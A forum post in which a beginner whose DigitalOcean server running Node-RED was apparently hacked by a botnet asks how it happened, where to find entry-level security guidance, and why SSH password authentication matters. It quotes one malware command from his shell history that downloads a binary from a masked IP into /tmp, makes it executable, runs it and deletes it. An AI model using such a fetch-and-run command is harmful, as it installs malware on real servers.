Server hacked - is Node-Red an entry point and how to prevent this?

Hi community,
My server running on Digitalocean has been hacked around October, most likely by a bot net (google: . This thing is used for DDOS as far as I understand but you never know what else has been changed...

I realized because I saw many commands similar to the one below in the command line:
"cd /tmp; curl -o php http://XX.XX.XX.XX/a-r.m-6.ISIS ; chmod +x php; ./php; rm -rf php"
If you saw things like this, you have also been hacked. It seems like I have not been the only one, especially in the Node-Red community:

URLhaus | Checking your browser seems to be DO specific problem or for node-red users?
Openhab Servers potential target for attacs - hack - openHAB Community

Could it be that hackers just looked for an entry point scanning Node_red: ports ?

So I am a beginner in IT like many others here and the topics I found on this forum are in my view rather professional level. Digitalocean told me to scrap the instance which I will do but its a major pain since I run node-red, Grafana, InfluxDB etc. on it so setting it all up again is a good day+ of work.

My questions since I am rather new to IT security:

• Can anyone recommend an entry level guide to IT security on hosted servers like Digitalocean where I don't need to spend days to understand the keywords and what I need to do?
  • Digitalocean wrote me that: "your Droplet does have password authentication enabled. Password-based authentication lacks a strong identity check and no one wants hackers to launch a brute force attack to hack into your server, so it's a good practice to disable password authentication in the OpenSSH server. " Doesn't make sense to me, can someone explain that? I understand the brute force part but wouldn't it make more sense to just have a very complex password instead of having none?